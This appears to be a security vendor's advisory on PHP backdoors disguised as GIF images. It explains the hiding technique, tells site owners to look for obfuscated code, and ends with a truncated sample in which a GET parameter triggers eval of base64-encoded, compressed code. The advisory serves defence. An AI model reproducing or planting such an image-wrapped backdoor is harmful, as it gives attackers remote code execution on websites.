Backdoors are pieces of code that allow attackers to bypass authentication, maintain their access to the server and reinfect files. Some of those malicious files can be as simple as a single line of code, allowing the execution of remote code, or complex algorithms, providing different functions to the attacker.

Malware creators are almost always trying to hide their code to make the detection and analysis as difficulty as possible. One of such hiding methods is renaming the file to have an image extension, or appending php code to an existing image and then loading the image as code from a different loader component.




This malicious code affects any vulnerable or compromised website that is configured to interpret the script language.


Inspect your site's files, specially theme related, to find for code you don't recognize. Look for any encoded or obfuscated PHP code.
Also, you can sign up with us and let our team remove the malware for you.


GIF89a�����ÿÿÿ���!ù����,�������D�;�<?php $cek = $_GET['cek'];if($cek == "sistem"){ eval(gzinflate(base64_decode('ZVHbagMh